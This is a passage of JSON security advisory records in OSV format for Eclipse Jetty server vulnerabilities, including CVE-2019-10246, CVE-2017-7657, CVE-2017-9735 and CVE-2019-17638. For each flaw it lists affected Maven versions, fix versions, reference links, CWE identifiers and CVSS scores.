"database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-07-13T18:07:02Z", "nvd_published_at": "2011-12-30T01:55:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r28m-g6j9-r2h5", "published": "2019-04-23T16:07:18Z", "modified": "2024-02-16T08:10:20.837486Z", "aliases": [ "CVE-2019-10246" ], "summary": "Information Exposure vulnerability in Eclipse Jetty", "details": "In Eclipse Jetty version 9.2.27, 9.3.26, and 9.4.16, the server running on Windows is vulnerable to exposure of the fully qualified Base Resource directory name on Windows to a remote client when it is configured for showing a Listing of directory contents. 
This information reveal is restricted to only the content in the configured base resource directories.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.2.0" }, { "fixed": "9.2.28.v20190418" } ] } ], "versions": [ "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.3.v20140905", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.2.27.v20190403", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-r28m-g6j9-r2h5/GHSA-r28m-g6j9-r2h5.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.27.v20190418" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", 
"9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.26.v20190403", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-r28m-g6j9-r2h5/GHSA-r28m-g6j9-r2h5.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.17.v20190418" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.16.v20190411", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-r28m-g6j9-r2h5/GHSA-r28m-g6j9-r2h5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10246" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=546576" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": 
"https://security.netapp.com/advisory/ntap-20190509-0003" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-213" ], "github_reviewed": true, "github_reviewed_at": "2019-04-23T16:03:54Z", "nvd_published_at": "2019-04-22T20:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vgg8-72f2-qm23", "published": "2018-10-19T16:15:34Z", "modified": "2024-02-17T05:36:15.080820Z", "aliases": [ "CVE-2017-7657" ], "summary": "Critical severity vulnerability that affects org.eclipse.jetty:jetty-server", "details": "In Eclipse Jetty, versions 9.2.x and older, 9.3.x, transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. 
If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.2.25.v20180606" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", 
"8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.3.v20140905", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.2.25.v20180105", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-vgg8-72f2-qm23/GHSA-vgg8-72f2-qm23.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" 
}, { "fixed": "9.3.24.v20180605" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.23.v20180228", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-vgg8-72f2-qm23/GHSA-vgg8-72f2-qm23.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7657" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0910" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=535668" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-vgg8-72f2-qm23" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r41af10c4adec8d34a969abeb07fd0d6ad0c86768b751464f1cdd23e8@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9159c9e7ec9eac1613da2dbaddbc15691a13d4dbb2c8be974f42e6ae@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra6f956ed4ec2855583b2d0c8b4802b450f593d37b77509b48cd5d574@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181014-0001" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbst03953en_us" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4278" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041194" } ], "database_specific": { "cwe_ids": [ "CWE-190", "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:57:40Z", "nvd_published_at": "2018-06-26T16:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wfcc-pff6-rgc5", "published": "2018-10-19T16:15:46Z", "modified": "2024-02-16T08:22:10.602897Z", "aliases": [ "CVE-2017-9735" ], "summary": "Jetty vulnerable to exposure of sensitive information due to observable discrepancy", "details": "Jetty through 9.4.x contains a timing channel attack in `util/security/Password.java`, which allows attackers to obtain access by observing elapsed times before rejection of incorrect passwords.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { 
"fixed": "9.4.6.v20170531" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.5.v20170502", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-wfcc-pff6-rgc5/GHSA-wfcc-pff6-rgc5.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.20.v20170531" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.19.v20170502", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-wfcc-pff6-rgc5/GHSA-wfcc-pff6-rgc5.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.2.22.v20170606" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", 
"7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", 
"9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.3.v20140905", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.2.21.v20170120", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-wfcc-pff6-rgc5/GHSA-wfcc-pff6-rgc5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-9735" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/issues/1556" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/commit/042f325f1cd6e7891d72c7e668f5947b5457dc02" }, { "type": "WEB", "url": "https://bugs.debian.org/864631" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/36870f6c51f5bc25e6f7bb1fcace0e57e81f1524019b11f466738559@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/f887a5978f5e4c62b9cfe876336628385cff429e796962649649ec8a@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00016.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20170826163336/http://www.securityfocus.com/bid/99104" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-203" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:00:10Z", "nvd_published_at": "2017-06-16T21:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x3rh-m7vp-35f2", "published": "2020-08-05T14:52:59Z", "modified": "2024-03-14T05:49:04.832402Z", "aliases": [ "CVE-2019-17638" ], "summary": "Operation on a Resource after Expiration or Release in Jetty Server", "details": "In Eclipse Jetty, versions 9.4.27.v20200227 to 9.4.29.v20200521, in case of too large response headers, Jetty throws an exception to produce an HTTP 431 error. When this happens, the ByteBuffer containing the HTTP response headers is released back to the ByteBufferPool twice. Because of this double release, two threads can acquire the same ByteBuffer from the pool and while thread1 is about to use the ByteBuffer to write response1 data, thread2 fills the ByteBuffer with response2 data. 
Thread1 then proceeds to write the buffer that now contains response2 data. This results in client1, which issued request1 and expects responses, to see response2 which could contain sensitive data belonging to client2 (HTTP session ids, authentication credentials, etc.).", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.27" }, { "fixed": "9.4.30.v20200611" } ] } ], "versions": [ "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.30.v20200610", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/08/GHSA-x3rh-m7vp-35f2/GHSA-x3rh-m7vp-35f2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17638" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/issues/4936" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/commit/ff8ae56fa939c3477a0cdd1ff56ce3d902f08fba" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGECLIPSEJETTY-575561" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XE6US6VPZHOWFMUSFGDS5V2DNQPY5MKB" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd98cfd012490cb02caa1a11aaa0cc38bff2d43bcce9b20c2f01063dd@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rbe1f230e87ea947593145d0072d0097ddb0af10fee1161db8ca1546c@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra8661fc8c69c647cb06153c1485d48484a833d873f75dfe45937e9de@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9a2cfa56d30782a0c17a5deb951a622d1f5c8de48e1c3b578ffc2a84@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9584c4304c888f651d214341a939bd264ed30c9e3d0d30fe85097ecf@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r81f58591fb4716fb867b36956f30c7c8ad4ab3f23abc952d9d86a2a0@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7fc5f2ed49641ea91c433e3cd0fc3d31c0278c87b82b15c33b881415@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r521168299e023fb075b57afe33d17ff1d09e8a10e0fd8c775ea0e028@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4bdd3f7bb6820a79f9416b6667d718a06d269018619a75ce4b759318@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r378e4cdec15e132575aa1dcb6296ffeff2a896745a8991522e266ad4@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r29073905dc9139d0d7a146595694bf57bb9e35e5ec6aa73eb9c8443a@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=564984" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2020/08/17/1" } ], "database_specific": { "cwe_ids": [ "CWE-672", "CWE-675" ], "github_reviewed": true, "github_reviewed_at": "2020-08-03T20:11:29Z", "nvd_published_at": "2020-07-09T18:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" } 
